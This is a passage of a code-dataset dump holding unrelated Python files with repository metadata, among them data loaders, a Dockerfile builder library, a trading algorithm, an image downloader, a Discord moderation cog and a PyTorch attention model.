super()._post_load_hook_(df)\n\n \nclass QintHcdLoader(QintLoader) :\n def _post_load_hook_(self, df):\n df = df[df.subjectid.str.startswith('HCD', False)]\n return super()._post_load_hook_(df)\n\n\nclass QintHcaLoader(QintLoader) :\n def _post_load_hook_(self, df):\n df = df[df.subjectid.str.startswith('HCA', False)]\n return super()._post_load_hook_(df)\n\n\nclass KsadsLoader(RedcapLoader):\n def __init__(self, definitions_dir=\"./definitions/\"):\n super().__init__('ksads', definitions_dir)\n\n def _fields_hook_(self, fields):\n return fields + ['patientid']\n\n def _load_hook_(self, fields):\n redcap = CachedRedcap()\n exclude = ['subject', 'subjectkey', 'gender', 'interview_date', 'interview_age']\n fields = [x for x in fields if x not in exclude]\n df = redcap(self.get_source_name(), list(fields))\n return df\n\n def _post_load_hook_(self, df):\n visit = config['visit']\n df = df[df.patientid.str.contains(\"V\"+visit)]\n df['subject']=df.patientid.str[:10]\n \n return super()._post_load_hook_(df)\n\n\nclass SsagaLoader(RedcapLoader):\n def __init__(self, definitions_dir=\"./definitions/\"):\n super().__init__('ssaga', definitions_dir)\n\n def _fields_hook_(self, fields):\n return fields + ['hcpa_id']\n\n def _load_hook_(self, fields):\n redcap = CachedRedcap()\n exclude = ['subject', 'subjectkey', 'gender', 'interview_date', 'interview_age']\n fields = [x for x in fields if x not in exclude]\n df = redcap(self.get_source_name(), list(fields))\n return df\n\n def _post_load_hook_(self, df):\n df = df.rename(columns={\"hcpa_id\": \"subject\"})\n return super()._post_load_hook_(df)\n","repo_name":"humanconnectome/NDA_submissions","sub_path":"Crosswalk/Loader.py","file_name":"Loader.py","file_ext":"py","file_size_in_byte":9923,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"16"} +{"seq_id":"8776092816","text":"import numpy as np\r\n\r\ndef ErrorCM(yd,yn):\r\n if len(yn[0])!=1:\r\n yn=np.array(yn)\r\n yd=np.array(yd)\r\n Err=yd-yn\r\n ET=np.sqrt(np.mean(Err**2)) \r\n return ET\r\n else:\r\n yn=np.array(yn)\r\n yd=np.array(yd)\r\n yn=yn.T\r\n yn=yn[0][0]\r\n Err=yd-yn\r\n ET=np.sqrt(np.mean(Err**2)) \r\n return ET\r\n \r\n ","repo_name":"jhonnier-t/Backpropagation-Red-Neuronal-General-Multicapa","sub_path":"ErrorCuadraticoMedio.py","file_name":"ErrorCuadraticoMedio.py","file_ext":"py","file_size_in_byte":381,"program_lang":"python","lang":"cy","doc_type":"code","stars":2,"dataset":"github-code","pt":"16"} +{"seq_id":"29061393669","text":"from __future__ import annotations\n\nfrom dataclasses import dataclass\nfrom pathlib import PosixPath\nfrom typing import TYPE_CHECKING\n\nfrom .._formatters import format_shell_cmd, format_stage_name, json_if_spaces\nfrom ._base import BuildStep\n\n\nif TYPE_CHECKING:\n from typing import Literal\n\n from .._stage import Stage\n from .._types import BaseImage, Checksum, Mount\n\n\nclass ARG(BuildStep):\n \"\"\"\n Define a variable that users can pass at build-time to the builder with the `docker build`.\n\n The difference with ENV is that env vars set with ARG\n are not available in running container, only at build-time.\n\n https://docs.docker.com/engine/reference/builder/#arg\n \"\"\"\n __slots__ = ('name', 'default')\n\n def __init__(self, name: str, default: str | None = None) -> None:\n assert name\n self.name = name\n self.default = default\n\n def as_str(self) -> str:\n result = f'ARG {self.name}'\n if self.default is not None:\n result += f'={self.default}'\n return result\n\n\nclass RUN(BuildStep):\n 
\"\"\"Execute any commands in a new layer on top of the current image and commit the results.\n\n https://docs.docker.com/engine/reference/builder/#run\n \"\"\"\n __slots__ = ('first', 'rest', 'mount', 'network', 'security', 'shell')\n\n def __init__(\n self,\n first: str | list[str],\n *rest: str,\n mount: Mount | None = None,\n network: Literal['default', 'none', 'host'] = 'default',\n security: Literal['insecure', 'sandbox'] = 'sandbox',\n shell: bool = True,\n ) -> None:\n assert first\n if not shell and rest:\n raise ValueError('cannot use `shell=False` with multiple commands')\n self.first = first\n self.rest = rest\n self.mount = mount\n self.network = network\n self.security = security\n self.shell = shell\n\n def as_str(self) -> str:\n result = 'RUN'\n if self.mount is not None:\n result += f' --mount={self.mount}'\n if self.network != 'default':\n result += f' --network={self.network}'\n if self.security != 'sandbox':\n result += f' --security={self.security}'\n if isinstance(self.first, str) and self.rest:\n result += ' ' + ' && \\\\\\n '.join((self.first,) + self.rest)\n else:\n result += ' ' + format_shell_cmd(self.first, shell=self.shell)\n return result\n\n @property\n def min_version(self) -> str:\n if self.security != 'sandbox':\n return 'labs'\n if self.mount is not None:\n return '1.2'\n if self.network != 'default':\n return '1.1'\n return '1.0'\n\n\nclass ENV(BuildStep):\n \"\"\"Set an environment variable.\n\n The environment variables set using ENV will persist when a container\n is run from the resulting image.\n\n https://docs.docker.com/engine/reference/builder/#env\n \"\"\"\n __slots__ = ('key', 'value')\n\n def __init__(self, key: str, value: str) -> None:\n assert key\n self.key = key\n self.value = value\n\n def as_str(self) -> str:\n result = f'ENV {self.key}'\n value = self.value\n if not value or ' ' in value:\n value = f'\"{value}\"'\n result += f'={value}'\n return result\n\n\n@dataclass(repr=False)\nclass _BaseAdd(BuildStep):\n src: str | PosixPath | list[str | PosixPath]\n dst: str | PosixPath\n chown: str | int | None = None\n link: bool = False\n\n def as_str(self) -> str:\n result = ''\n if self.chown:\n result += f' --chown={self.chown}'\n if self.link:\n result += ' --link'\n parts = self._sources + [str(self.dst)]\n return f'{result} {json_if_spaces(parts)}'\n\n @property\n def _sources(self) -> list[str]:\n if isinstance(self.src, list):\n return [str(s) for s in self.src]\n return [str(self.src)]\n\n @property\n def min_version(self) -> str:\n if self.link:\n return '1.4'\n return '1.0'\n\n\n@dataclass\nclass DOWNLOAD(_BaseAdd):\n \"\"\"Download a remote file.\n\n https://docs.docker.com/engine/reference/builder/#add\n \"\"\"\n checksum: Checksum | None = None\n\n def as_str(self) -> str:\n result = 'ADD'\n if self.checksum:\n result += f' --checksum={self.checksum}'\n return f'{result}{super().as_str()}'\n\n @property\n def min_version(self) -> str:\n if self.checksum:\n return 'master-labs'\n return super().min_version\n\n\n@dataclass\nclass CLONE(_BaseAdd):\n \"\"\"Clone a git repository.\n\n Currently, available only in development channel. 
So, you'll need to explicitly\n specify the syntax to use this instruction::\n\n image = d.Image(\n stage,\n syntax_channel='docker/dockerfile-upstream',\n )\n\n https://docs.docker.com/engine/reference/builder/#adding-a-git-repository-add-git-ref-dir\n \"\"\"\n keep_git_dir: bool = False\n\n def as_str(self) -> str:\n result = 'ADD'\n if self.keep_git_dir:\n result += ' --keep-git-dir=true'\n return f'{result}{super().as_str()}'\n\n @property\n def min_version(self) -> str:\n return 'master-labs'\n\n\nclass EXTRACT(_BaseAdd):\n \"\"\"Extract an archive from the host machine into the image.\n\n Supported formats: identity, gzip, bzip2, and xz.\n\n https://docs.docker.com/engine/reference/builder/#add\n \"\"\"\n\n def as_str(self) -> str:\n return f'ADD{super().as_str()}'\n\n\n@dataclass\nclass COPY(_BaseAdd):\n \"\"\"\n Copies new files or directories from src and adds them to the filesystem\n of the image at the path dst.\n\n https://docs.docker.com/engine/reference/builder/#copy\n \"\"\"\n from_stage: Stage | BaseImage | None = None\n\n def as_str(self) -> str:\n result = 'COPY'\n if self.from_stage:\n result += f' --from={format_stage_name(self.from_stage)}'\n return f'{result}{super().as_str()}'\n\n\nclass USER(BuildStep):\n \"\"\"Set the user name to use as the default user for the remainder of the stage.\n\n https://docs.docker.com/engine/reference/builder/#user\n \"\"\"\n __slots__ = ('user', 'group')\n\n def __init__(self, user: str | int, group: str | int | None = None) -> None:\n self.user = user\n self.group = group\n\n def as_str(self) -> str:\n result = f'USER {self.user}'\n if self.group is not None:\n result += f':{self.group}'\n return result\n\n\nclass WORKDIR(BuildStep):\n \"\"\"\n Set the working directory for any RUN, CMD, ENTRYPOINT, COPY and ADD instructions that follow.\n\n If the path doesn't exist, it will be created.\n\n https://docs.docker.com/engine/reference/builder/#workdir\n \"\"\"\n __slots__ = ('path', )\n\n def __init__(self, path: str | PosixPath) -> None:\n assert path\n self.path = path\n\n def as_str(self) -> str:\n return f'WORKDIR {self.path}'\n\n\nclass ONBUILD(BuildStep):\n \"\"\"\n Add to the image a trigger instruction to be executed at a later time,\n when the image is used as the base for another build.\n\n https://docs.docker.com/engine/reference/builder/#onbuild\n \"\"\"\n __slots__ = ('trigger',)\n\n def __init__(self, trigger: BuildStep) -> None:\n assert not isinstance(trigger, ONBUILD), 'cannot use ONBUILD inside ONBUILD'\n self.trigger = trigger\n\n def as_str(self) -> str:\n return f'ONBUILD {self.trigger.as_str()}'\n\n\nclass SHELL(BuildStep):\n \"\"\"Override the default shell used for the shell form of commands.\n\n It affects shell form commands inside of RUN, CMD, and ENTRYPOINT instructions.\n\n https://docs.docker.com/engine/reference/builder/#shell\n \"\"\"\n __slots__ = ('cmd', )\n\n def __init__(self, cmd: str | list[str]) -> None:\n assert cmd\n self.cmd = cmd\n\n def as_str(self) -> str:\n return f'SHELL {format_shell_cmd(self.cmd, shell=False)}'\n","repo_name":"orsinium-labs/docked","sub_path":"docked/_steps/_build.py","file_name":"_build.py","file_ext":"py","file_size_in_byte":7957,"program_lang":"python","lang":"en","doc_type":"code","stars":43,"dataset":"github-code","pt":"16"} +{"seq_id":"15853122452","text":"class SellAtPrice(QCAlgorithm):\n\n def Initialize(self):\n\n self.SetCash(10000)\n\n self.SetStartDate(2010,1,1)\n\n self.SetEndDate(2020,1,1)\n\n \n\n self.apply = self.AddEquity(\"AAPL\",Resolution.Daily)\n\n 
\n\n self.limit_price = 50\n\n self.invest = True\n\n\n def OnData(self,data):\n\n if not self.Portfolio.Invested and self.invest:\n\n self.SetHoldings(\"AAPL\",1)\n\n closing_price = self.Portfolio['AAPL'].Price\n\n if closing_price > self.limit_price and self.Portfolio.Invested:\n\n self.Liquidate(\"AAPL\")\n\n self.invest = False","repo_name":"rkaelle/algo-trading-strategies","sub_path":"HardcodedSell.py","file_name":"HardcodedSell.py","file_ext":"py","file_size_in_byte":615,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"7407130206","text":"#! python3\n# -*- coding: UTF-8 -*-\n#coding: UTF-8\n#获取torrent的相关图片\n\nfrom bs4 import BeautifulSoup\nimport requests,queue,threading\n\nimgQueue = queue.Queue()\n\ndef getImg(imgLink='http://www.sinabt.com/B/BxeA7QN6.jpg',enable_proxy = False, proxy_string = {\"http\":\"127.0.0.1:8787\",\"https\":\"127.0.0.1:8787\",\"socks\":\"127.0.0.1:1080\"}):\n \"获取torrent的相关图片\"\n proxies = {}\n timeout = 15\n picFilename = ''\n \n picFilename = imgLink[imgLink.rfind('/')+1:len(imgLink)]\n\n headers = {'User-Agent':'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36'}\n try:\n r1 = requests.get(imgLink, headers = headers,proxies = proxies,timeout = timeout)\n #r1 = requests.get('http://www.jandown.com/fetch.php',params = formdata, headers = headers) #print的结果是b''���不知什么2进制意思,内容是否为空\n content = r1.content\n except Exception as e:\n print('error:',e)\n \n #print\n #print 'The real URL is: '\n #print response.geturl()\n #print\n #print 'The Response info is:'\n #info=response.info()\n #for key,value in info.items():\n # print \"%s = %s\" % (key,value)\n #print\n\n return picFilename,content\n\ndef getImgT(myQueue,outpath,enable_proxy = False, proxy_string = {\"http\":\"127.0.0.1:8787\",\"https\":\"127.0.0.1:8787\",\"socks\":\"127.0.0.1:1080\"}):\n \"获取torrent的相关图片\"\n proxies = {}\n timeout = 15\n picFilename = ''\n\n imgLink = myQueue.get_nowait()\n picFilename = imgLink[imgLink.rfind('/')+1:]\n\n headers = {'User-Agent':'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36'}\n try:\n r1 = requests.get(imgLink, headers = headers,proxies = proxies,timeout = timeout)\n imgContent = r1.content\n if len(imgContent) > 0:\n picFullpath = (outpath + r'/' + picFilename)\n ofile = open(picFullpath,'wb')\n ofile.write(imgContent)\n ofile.close()\n except Exception as e:\n print('error:',e)\n\ndef getImgs(imgList,outpath):\n for item in imgList:\n imgQueue.put(item)\n threadN = 10\n jqueue = imgQueue.qsize()\n if jqueue < threadN:\n threadN = jqueue\n\n threads = []\n for i in range(0,threadN):\n thread = threading.Thread(target = getImgT, args = (imgQueue,outpath,))\n threads.append(thread)\n thread.start()\n for thread1 in threads:\n thread1.join()\n\nif __name__ == '__main__':\n outfilename,imgContent = getImg()\n outfile = open(outfilename,'wb')\n outfile.write(imgContent)\n outfile.close()\n print(outfilename,' be saved')\n","repo_name":"whatrye/getAiBT","sub_path":"getImg.py","file_name":"getImg.py","file_ext":"py","file_size_in_byte":2706,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"17647099595","text":"import numpy as np\n\n#%%\ndef isNestedList(input):\n '''\n Check if a list is nested or not.\n '''\n # Assert that the input is a list\n assert isinstance(input, list), 'Input is not a list'\n \n # Convert to numpy array\n 
arr = np.array(input)\n \n return bool(arr.ndim>1)\n\n#%%\ndef vec2angle(v1, v2, unit='radian'):\n '''\n It calculates angle between two vectors.\n \n Input\n --------\n v1: vector 1. Example: [10, 20, 30]\n v2: vector 2. Example: [30, 20, 40]\n unit: Either radian or degree\n \n Output\n --------\n angle: Angle between two vectors\n \n Example\n --------\n v1 = [10, 20, 10]\n v2 = [20, 40, 30]\n \n angle = vec2angle(v1, v2, unit='degree')\n\n '''\n unit_v1 = v1 / np.linalg.norm(v1) # unit vector of v1\n unit_v2 = v2 / np.linalg.norm(v2) # unit vector of v2\n dp = np.dot(unit_v1, unit_v2) # dot product\n angle = np.arccos(dp) # calculate inverse cos to get the angle\n \n if unit == 'degree': return np.rad2deg(angle)\n elif unit == 'radian': return angle\n else: print('Wrong keyword for unit')\n \n#%%\ndef points2vec(p1, p2):\n '''\n It calculates the vector from two points.\n \n Input\n -------\n p1: A 2d or 3d point. It is the start point. Example: [20, 30]\n p2: A 2d or 3d point. It is the end point. Example: [20, 30]\n \n Output\n -------\n Output vector in list format.\n \n Example:\n p1 = [10, 20, 10]\n p2 = [20, 40, 30]\n \n vec = points2vec(p1, p2)\n \n '''\n assert len(p1)==len(p2), 'Lenght of two points are not equal'\n \n # If points are in list or tuple, convert to numpy array\n if isinstance(p1, (list, tuple)): p1 = np.array(p1)\n if isinstance(p2, (list, tuple)): p2 = np.array(p2)\n \n return list(p2 - p1)\n \n#%%\ndef sampling(voxels, p1_idx=0, step=5, step_range=(1,5), angle_range=(5,30), rate=0.2, verbose=False):\n '''\n It samples points from a set of points. Step size will be high For points that\n are almost in the same direction. Otherwise, step size will decrease.\n \n Procedure\n -----------\n - Select three points p1, p2, and p3 using the step parameter\n - Calculate two vectors v12 and v13\n - Find angle between v12 and v13\n - Based on the angle, change step size\n \n Input\n -----------\n voxels: list of points. Example: [[x1,y1,z1], [x2,y2,z2], ...]\n p1_idx: index of the first sampleing point\n step: step size\n step_range: min and max allowed value for step size\n angle_range: min and max value of angle. 
Beyond that, step size will be changed accordingly\n rate: 0.2 means 20% increment or decrement of step size\n verbose: (bool) whether to allow printing\n \n Output\n -----------\n sample_points: a list that contains sampled points\n \n Example:\n -----------\n \n # Read 3d data stored in .mat format\n data = sio.loadmat('s.mat') # contains one canal\n vol = data['cc4'] # get volume\n \n voxels = np.argwhere(vol==1) # get voxels\n voxels = voxels.tolist() # convert to list\n \n sample_points = sampling(voxels, p1_idx=0, step=5, step_range=(1,5), \n angle_range=(5,30), rate=0.2, verbose=False)\n '''\n sample_points = []\n \n while(True):\n \n # Ensure limits of step size\n if step > step_range[1]: \n step = step_range[1]\n if verbose: print('Truncating to max_step')\n \n if step < step_range[0]:\n step = step_range[0]\n if verbose: print('Truncating to min_step')\n \n # Get indices of 2nd and 3rd points\n p2_idx = int(p1_idx + step)\n p3_idx = int(p2_idx + step) \n \n # Stopping criterion: If p1_idx exceeds range, then append last voxel, and then break \n if p1_idx >= len(voxels)-1: \n sample_points.append(voxels[-1])\n if verbose: print('Terminating as p1_idx exceeds range')\n break\n \n # Stopping criterion: If p2_idx exceeds range, then append p1 and last voxel, and then break \n if p2_idx >= len(voxels)-1: \n sample_points.append(voxels[p1_idx])\n sample_points.append(voxels[-1])\n if verbose: print('Terminating as p2_idx exceeds range')\n break\n \n # Stopping criterion: If p3_idx exceeds range, then append p1, p2 and last voxel, and then break \n if p3_idx >= len(voxels)-1: \n sample_points.append(voxels[p1_idx])\n sample_points.append(voxels[p2_idx])\n sample_points.append(voxels[-1])\n if verbose: print('Terminating as p3_idx exceeds range')\n break\n \n # Calcuate vectors p1p2 and p2p3\n v12 = points2vec(voxels[p1_idx], voxels[p2_idx])\n v23 = points2vec(voxels[p2_idx], voxels[p3_idx])\n \n # Calculate angle between vectors\n angle = vec2angle(v12, v23, unit='degree')\n if verbose: print('Angle: ', angle)\n \n # Redefine step size based on angle\n if angle >= angle_range[0] and angle <= angle_range[1]: \n if verbose: print('Step size -- no change')\n pass # no need to change step size\n elif angle < angle_range[0]: \n step = step * (1 + rate) # increase step size\n if verbose: print('Step size -- increased')\n elif angle > angle_range[1]: \n step = step * (1 - rate) # reduce step size\n if verbose: print('Step size -- decreased')\n # continue # do this sampling again, no sample will be appended\n \n # Store sample points p1 and p2. 
Don't need to store p3, it will stored in\n # the next iteration as it will become p1 then.\n sample_points.append(voxels[p1_idx])\n sample_points.append(voxels[p2_idx])\n # sample_points.append(voxels[p3_idx])\n \n # Update index of the first point\n p1_idx = p3_idx\n \n return sample_points \n \n#%%\ndef create_vol(shape, dtype, voxels, data):\n '''\n It creates volume based on given voxels and data\n \n Input\n -------\n shape: shape of the volume\n dtype: data type\n voxels: voxels of the volume that will contain a specific value\n data: value that voxels will contain\n \n Output\n --------\n vol: a 3D volume\n \n '''\n \n if isinstance(voxels, list): voxels = np.array(voxels)\n \n vol = np.zeros(shape, dtype)\n vol[voxels[:,0], voxels[:,1], voxels[:,2]] = data\n \n return vol\n\n#%%\ndef xyz2asc(data, name):\n '''\n It writes x, y, and z values to a .asc file.\n '''\n f = open(name, 'w')\n for d in data: print(\"%f %f %f\" % (d[0], d[1], d[2]), file=f)\n f.close()\n\n","repo_name":"mrinal054/my_utils","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":6766,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"29156382855","text":"\"\"\"\n给你一棵所有节点为非负值的二叉搜索树,请你计算树中任意两节点的差的绝对值的最小值。\n\n示例:\n输入:\n 1\n \\\n 3\n /\n 2\n输出:\n1\n解释:\n最小绝对差为 1,其中 2 和 1 的差的绝对值为 1(或者 2 和 3)。\n\"\"\"\n\n\n# Definition for a binary tree node.\n# class TreeNode(object):\n# def __init__(self, x):\n# self.val = x\n# self.left = None\n# self.right = None\n\nclass Solution(object):\n def getMinimumDifference(self, root):\n \"\"\"\n :type root: TreeNode\n :rtype: int\n \"\"\"\n val_list = []\n queue = [root]\n\n while queue:\n node = queue.pop(0)\n val_list.append(node.val)\n if node.left:\n queue.append(node.left)\n if node.right:\n queue.append(node.right)\n\n val_list.sort()\n min_diff = val_list[1] - val_list[0]\n\n for index in range(2, len(val_list)):\n temp = abs(val_list[index] - val_list[index-1])\n if min_diff > temp:\n min_diff = temp\n if min_diff == 0:\n return 0\n return min_diff\n","repo_name":"XinZhaoFu/leetcode_moyu","sub_path":"530二叉搜索树的最小绝对差.py","file_name":"530二叉搜索树的最小绝对差.py","file_ext":"py","file_size_in_byte":1192,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"33541080261","text":"import discord\nfrom discord.ext import commands\n\nfrom constants import roles\nfrom utils import logger\n\n\nclass Message(commands.Cog):\n def __init__(self, bot):\n self.bot = bot\n\n @commands.command(description = \"Delete N last messages\")\n @commands.has_any_role(roles.ADMINISTRATOR, roles.MODERATOR)\n async def purge(self, ctx, number_of_messages = 1):\n \"\"\"Delete n number of messages in a channel\"\"\"\n\n await ctx.channel.purge(limit = int(number_of_messages + 1))\n embed = discord.Embed(\n colour = discord.Colour.red(),\n description = str(number_of_messages) + \" messages deleted in \" + ctx.message.channel.mention,\n )\n\n embed.set_author(name = ctx.author.nick, icon_url = ctx.author.avatar_url)\n\n await logger.log_action(ctx.guild, embed)\n\n @commands.command(aliases=[\"msg-echo\"])\n @commands.has_any_role(roles.ADMINISTRATOR, roles.MODERATOR)\n async def echo(self, ctx, channel: discord.TextChannel, *, message = None):\n \"\"\"Send message to a channel as the bot\"\"\"\n\n files = []\n for attachment in ctx.message.attachments:\n files.append(await attachment.to_file())\n await channel.send(content = message, files = files)\n\n 
@commands.command(aliases=[\"msg-publish\"])\n @commands.has_any_role(roles.ADMINISTRATOR, roles.MODERATOR)\n async def publish(self, ctx, channel: discord.TextChannel, *, message = None):\n \"\"\"Send message to a channel as the bot and publish it\"\"\"\n \n files = []\n for attachment in ctx.message.attachments:\n files.append(await attachment.to_file())\n message = await channel.send(content = message, files = files)\n await message.publish()\n\n @commands.command(aliases=[\"msg-edit\"])\n @commands.has_any_role(roles.ADMINISTRATOR, roles.MODERATOR)\n async def edit(self, ctx, channel: discord.TextChannel, id: int, *, new_message):\n \"\"\"Edit message sent as the bot\"\"\"\n\n message = await channel.fetch_message(id)\n await message.edit(content = new_message)\n\n\ndef setup(bot):\n bot.add_cog(Message(bot))\n","repo_name":"EnisMulic/MSG-Z","sub_path":"cogs/message.py","file_name":"message.py","file_ext":"py","file_size_in_byte":2131,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"11102509727","text":"import numpy as np\n\ndef Toy_Time_Series(ff, time, \n n_series_for_cluster = 10, \n n_cluster = 3,\n random_state = None,\n r_ampl = None,\n r_off = None,\n iterargs = None, \n **kwargs\n ):\n \"\"\"\n --------------------------\n |\n | Author: Edoardo Gabrielli\n |\n --------------------------\n |\n | DESCRIPTION:\n | Function that build a toy model for a time series clustering problem.\n |\n --------------------------\n |\n | INPUT PARAMETERS:\n | - ff: func\n | The function that rules the toy model. This function need one argument:\n | 1) x: numpy nd-array, shape: (n_series_for_cluster, time) \n | This represent the array that will be filled with the function (for one single cluster)\n | Optional:\n | 2) **kwargs (anything you want) other parameters that you need for the model \n | Example: \n | def ff(x, q = 0, phi=0):\n | return np.sin(x + phi) + q \n | \n | - time: numpy 1d array\n | Time step in wich every series will be evaluated.\n | \n | - n_series_for_cluster: int, default = 10\n | Number of time series for clusters.\n | \n | - n_cluster: int, default = 3\n | Number of clusters.\n | \n | - random_state: int, default = None\n | Numpy seed for reproducibility. \n | If none it will not set the seed.\n | \n | - r_ampl: int or float (positive), default = None\n | Amplitude of random fluctuation on the function func.\n | If None the random fluctiation is deactivated.\n | \n | - r_off: int or float (positive), default = None\n | Random offset on the y axis for the function func. 
Usefull to separate different time series of\n | the same cluster.\n | If None no offset will be applied to func.\n | \n | - iterargs: list of dict of shape (n_cluster, ), default = None\n | Iterable argument for the function ff (if you wanna pass different argument to different clusters).\n | If None the algorithm do not pass anithing to the function here (but it will still pass **kwargs).\n | \n | - **kwargs: \n | All the parameters that the function \"ff\" needs (in the previous example you need to pass phi here).\n | \n ------------------------\n |\n | OTPUT PARAMETERS:\n | - yy: numpy nd-array of shape (n_cluster * n_series_for_cluster, len(time)) \n | Matrix with the data for the clustering task.\n |\n ------------------------ \n FULL EXAMPLES OF USAGE:\n 1) Use of **kwargs\n >>> def func(x, q = 0, phi = 0):\n >>> return np.sin(x + phi) + q\n >>> n = 100\n >>> xx = np.linspace(0, 2*np.pi, n)\n >>> yy = Time_Series_Cluster_Building(func, xx, q = 1, phi = 3)\n \n 2) Use of iterargs and **kwargs with plot:\n >>> def func(x, q = 0, phi = 0):\n >>> return np.sin(x + phi) + q\n >>> n = 100\n >>> iters = [dict(phi=2), dict(phi=3), dict(phi=4)]\n >>> xx = np.linspace(0, 2*np.pi, n)\n >>> yy = Time_Series_Cluster_Building(func, xx, q = 0, iterargs=iters)\n >>> plt.plot(yy.T)\n >>> plt.show()\n \"\"\"\n # Some useful function...\n def add_noise(xx, r_ampl, r_off):\n \"\"\"\n Evaluate noise for the group of curve of a single cluster.\n \"\"\"\n if r_ampl != None:\n ampls = np.random.rand(*(xx.shape))*r_ampl # Random noise on amplitude\n else:\n ampls = np.zeros(xx.shape)\n if r_off != None:\n offs_num = (2*np.random.rand(xx.shape[0])-1)*r_off # Random noise on y offset\n offs = np.broadcast_to(offs_num, xx.T.shape).T # Brodcasting to adjust dimention\n else:\n offs = np.zeros(xx.shape)\n return ampls + offs\n \n ############################################\n if random_state != None:\n np.random.seed(random_state)\n \n step = len(time)\n xx = np.full(shape = ( n_series_for_cluster * n_cluster, step ), # Build matrix of \n fill_value=time ) # flat lines of the right shape\n\n yy = np.empty(xx.shape) # Empty array (this will contain the final time series)\n \n if iterargs==None:\n for i in range(n_cluster):\n lower_bond = i * n_series_for_cluster\n upper_bond = (i + 1) * n_series_for_cluster\n yy[lower_bond: upper_bond, :] = ff(xx[lower_bond: upper_bond, :], **kwargs)\n yy[lower_bond: upper_bond, :] += add_noise(xx[lower_bond: upper_bond, :], r_ampl, r_off)\n else: \n for i, others in zip(range(n_cluster), iterargs):\n lower_bond = i * n_series_for_cluster\n upper_bond = (i + 1) * n_series_for_cluster\n yy[lower_bond: upper_bond, :] = ff(xx[lower_bond: upper_bond, :], **others, **kwargs)\n yy[lower_bond: upper_bond, :] += add_noise(xx[lower_bond: upper_bond, :], r_ampl, r_off)\n return yy","repo_name":"cri98li/Data-Mining-2-Project-ts-classification","sub_path":"notebooks lezione/Time_Series_functions.py","file_name":"Time_Series_functions.py","file_ext":"py","file_size_in_byte":4994,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"36133559500","text":"#coding=utf-8\nimport torch.nn.functional as F\nfrom model.TCN import *\nfrom model.cnn import Conv1d\n\n\n# 不使用上下文信息进行对比实验\nclass CRFA_withoutContext(nn.Module):\n\n def __init__(self, dropout, embedding_dim, output_size, txt_vocab_size, concept_vocab_size, batch_size, hidden_size):\n\n super(CRFA_withoutContext, self).__init__()\n self.dropout = dropout\n self.embedding_dim = 
embedding_dim\n\n self.dropout = nn.Dropout(dropout)\n self.output_size = output_size\n\n self.word_embed = nn.Embedding(txt_vocab_size, embedding_dim)\n self.batch_size = batch_size\n self.hidden_size = hidden_size\n self.vocab_size = txt_vocab_size\n\n self.word_weight = nn.Parameter(torch.rand(embedding_dim, 1))\n self.cpt_weight = nn.Parameter(torch.rand(embedding_dim, 1))\n\n self.W_word_2 = nn.Parameter(torch.rand(1, 1))\n self.W_word_cpt = nn.Parameter(torch.rand(1, 1))\n\n self.W2 = nn.Linear(hidden_size, hidden_size)\n self.w2 = nn.Linear(hidden_size, hidden_size, bias=False)\n\n self.cpt_word_embed = nn.Embedding(concept_vocab_size, embedding_dim)\n\n self.tcn = TCN(embedding_dim=embedding_dim, output_size=hidden_size, num_channels=[100, 100, 100], kernel_size=2,\n dropout=0.5, emb_dropout=0.25)\n\n self.con1 = Conv1d(embedding_dim, embedding_dim, [1, 1])\n # Fully-Connected Layer\n self.relu = nn.ReLU()\n self.fc = nn.Linear(1800, self.output_size)\n\n def word_attention(self, input_sentences):\n '''S\n 在 每句话中,每个词由不同的重要性,我们赋予不同的权重,得到词的特征表示\n '''\n # h为上下文的表示\n # print(\"input_sentenses: \", input_sentences.shape) torch.Size([64, 29, 300])\n # h = self.tcn(input_sentences) # (64, 26, 128)\n u = torch.relu(torch.matmul(input_sentences, self.word_weight)) # 64, 30, 1\n # print(\"u--------\", u.shape)\n # print(\"u\", (torch.matmul(u, self.W_word_2).permute(0, 2, 1)/math.sqrt(self.hidden_size)))\n alpha1 = F.softmax(torch.matmul(u, self.W_word_2).permute(0, 2, 1), dim=2)\n # print(\"alpha1-------------\", alpha1.shape) # 64, 1, 30\n S = torch.bmm(alpha1, input_sentences) # torch.Size([64, 1, 300])\n # print(\"S.shape--------------\", S.shape)\n return S\n\n def cpt_attention(self, input_sentence):\n '''\n 在 每句话中,每个词由不同的重要性,我们赋予不同的权重,得到词的特征表示\n '''\n # h为上下文的表示\n # h = self.tcn(input_sentence)\n u = torch.relu(torch.matmul(input_sentence, self.cpt_weight)) # torch.Size([64, 26, 1])\n # print(\"u_cpt-------\", u.shape)\n alpha1 = torch.softmax(torch.matmul(u, self.W_word_cpt).permute(0, 2, 1), dim=2) # torch.Size([64, 1, 26])\n # print(\"alpha_cpt------\", alpha1.shape)\n S = torch.bmm(alpha1, input_sentence) # torch.Size([64, 1, 300])\n # print(\"s_cpt------\", S.shape)\n return S\n\n def forward(self, x, cpt_word):\n\n # 1. word encoder-attention\n encoded_sents = self.word_embed(x) # batch_size, sen_len, d_model 64,30,300\n # 1.1 word feature encoder\n # print(\"encoded_sents-----------\", encoded_sents.shape)\n x = self.dropout(encoded_sents)\n res_begin = x\n x = self.word_attention(x)\n # print(\"x1------\", x.shape)\n output_begin = x.squeeze(1)\n # print(\"output_begin-------\", output_begin.shape)\n # 1.2 res_first stage\n x = self.con1(res_begin)[-1].permute(0, 2, 1)\n x = self.dropout(x)\n res_mid = x\n x = self.word_attention(x)\n output_mid = x.squeeze(1)\n # print(\"output_mid------\", output_mid.shape)\n # 1.3 res_two stage\n x = self.con1(res_mid)[-1].permute(0, 2, 1)\n x = self.dropout(x)\n x = self.word_attention(x)\n output_third = x.squeeze(1)\n # print(\"output_third------\", output_third.shape)\n# ------------------------------------------------------------\n# '''\n # 